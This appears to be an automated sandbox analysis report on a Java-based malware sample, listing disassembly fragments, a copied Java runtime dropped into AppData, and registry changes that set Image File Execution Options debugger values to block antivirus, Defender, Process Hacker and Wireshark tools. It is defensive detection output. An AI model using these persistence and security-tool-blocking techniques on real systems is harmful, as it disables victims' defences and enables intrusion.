Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Code function: 2_2_02DFB947 push 00000000h; mov dword ptr [esp], esp 2_2_02DFB96D
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Code function: 2_2_02DFC477 push 00000000h; mov dword ptr [esp], esp 2_2_02DFC49D
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 6_3_156FC5E6 pushad ; retf 6_3_156FC5ED
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 6_3_156FCB90 pushad ; retf 6_3_156FCB91
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 6_3_156FCA72 push eax; retf 6_3_156FCA85
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 6_3_156FC61A pushad ; retf 6_3_156FC679
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 6_3_156FE8EA pushad ; retf 6_3_156FE8F9
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 6_3_156FE8A2 pushad ; retf 6_3_156FE8B1
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 6_3_1512832A pushad ; iretd 6_3_15128341
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 6_3_151299DC pushad ; retf 0028h 6_3_151299DD
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 6_3_15129AE3 push eax; retf 6_3_15129B0D
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 6_2_73A92E75 push ecx; ret 6_2_73A92E88
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 6_2_02978A11 push cs; retf 6_2_02978A31
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 6_2_02981F88 push es; retn 0024h 6_2_02981F8B
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 6_2_0297ECE0 pushfd ; iretd 6_2_0297ECE1
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 6_2_0297D5FB push es; retn 0001h 6_2_0297D6FF
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 6_2_028DD8F7 push 00000000h; mov dword ptr [esp], esp 6_2_028DD921
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 6_2_028DA20A push ecx; ret 6_2_028DA21A
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 6_2_028DA21B push ecx; ret 6_2_028DA225
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 6_2_028DB3B7 push 00000000h; mov dword ptr [esp], esp 6_2_028DB3DD
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 6_2_028DBB67 push 00000000h; mov dword ptr [esp], esp 6_2_028DBB8D
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 6_2_028DD8E0 push 00000000h; mov dword ptr [esp], esp 6_2_028DD921
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 6_2_028DB947 push 00000000h; mov dword ptr [esp], esp 6_2_028DB96D
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 6_2_028DC477 push 00000000h; mov dword ptr [esp], esp 6_2_028DC49D
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-namedpipe-l1-1-0.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-heap-l1-1-0.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\ktab.exe Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\klist.exe Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-errorhandling-l1-1-0.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-environment-l1-1-0.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\API-MS-Win-core-xstate-l2-1-0.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\java_crw_demo.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-rtlsupport-l1-1-0.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\ssvagent.exe Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\servertool.exe Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-processthreads-l1-1-1.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\dt_shmem.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\w2k_lsa_auth.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\prism_sw.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\tnameserv.exe Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\awt.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\jabswitch.exe Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\jjs.exe Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-debug-l1-1-0.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-utility-l1-1-0.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-multibyte-l1-1-0.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-localization-l1-2-0.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\bci.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\dtplugin\deployJava1.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\msvcp140.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\msvcp140_1.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\deploy.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\fontmanager.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-file-l1-2-0.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-math-l1-1-0.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\prism_common.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\sunec.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\sunmscapi.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\policytool.exe Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\java.exe Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-string-l1-1-0.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\gstreamer-lite.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-console-l1-2-0.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\orbd.exe Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\unpack.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\verify.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-runtime-l1-1-0.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-profile-l1-1-0.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-sysinfo-l1-1-0.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\JavaAccessBridge-32.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\management.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\j2pcsc.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\dt_socket.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-util-l1-1-0.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\jpeg.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\hprof.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\eula.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\javaw.exe Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\zip.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-synch-l1-1-0.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-libraryloader-l1-1-0.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-private-l1-1-0.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\msvcp140_2.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\client\jvm.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\javacpl.exe Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\mlib_image.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\pack200.exe Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\kinit.exe Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\java.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\jfxwebkit.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\plugin2\npjp2.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\javafx_font.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\jawt.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\plugin2\vcruntime140.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\dtplugin\npdeployJava1.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\net.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-convert-l1-1-0.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\lcms.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\j2gss.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-handle-l1-1-0.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\vcruntime140.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\sspi_bridge.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\ucrtbase.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\prism_d3d.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-console-l1-1-0.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\jfxmedia.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-file-l2-1-0.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\jp2launcher.exe Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-heap-l1-1-0.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-string-l1-1-0.dll Jump to dropped file
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe File created: C:\Users\user\AppData\Local\Temp\Windows6471774156078736222.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\t2k.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\glass.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-interlocked-l1-1-0.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\java-rmi.exe Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\resource.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-datetime-l1-1-0.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-synch-l1-2-0.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\jdwp.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\jaas_nt.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\splashscreen.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-conio-l1-1-0.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\decora_sse.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-memory-l1-1-0.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\plugin2\msvcp140.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-locale-l1-1-0.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-process-l1-1-0.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\keytool.exe Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\wsdetect.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-time-l1-1-0.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-processenvironment-l1-1-0.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\j2pkcs11.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\jp2native.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\npt.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\jfr.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\unpack200.exe Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\dcpr.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-filesystem-l1-1-0.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\javafx_iio.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\jsdt.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\fxplugins.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\glib-lite.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\WindowsAccessBridge-32.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\instrument.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\jsound.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\rmiregistry.exe Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-file-l1-1-0.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\JAWTAccessBridge-32.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\jp2iexp.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\jp2ssv.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-timezone-l1-1-0.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\javaws.exe Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\ssv.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\javacpl.cpl Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\jsoundds.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\rmid.exe Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-stdio-l1-1-0.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-processthreads-l1-1-0.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\jli.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\nio.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\README.txt
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\THIRDPARTYLICENSEREADME-JAVAFX.txt
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\THIRDPARTYLICENSEREADME.txt

Boot Survival

Source: C:\Windows\SysWOW64\regedit.exe Registry value created: svchost.exe
Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\UserAccountControlSettings.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ProcessHacker.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\procexp.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSASCui.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MsMpEng.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\NisSrv.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ConfigSecurityPolicy.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wireshark.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\text2pcap.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rawshark.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mergecap.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\capinfos.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\V3Up.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\V3Medic.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\BullGuarScanner.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\BullGuardUpdate.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\clamscan.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cis.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\FPAVServer.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\FPAVServer.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AVK.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AVK.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\GdBgInx64.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\GdBgInx64.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\GDScan.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\GDScan.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AVKWCtlx64.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AVKWCtlx64.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AVKTray.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AVKTray.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\guardxkickoff_x64.exe debugger
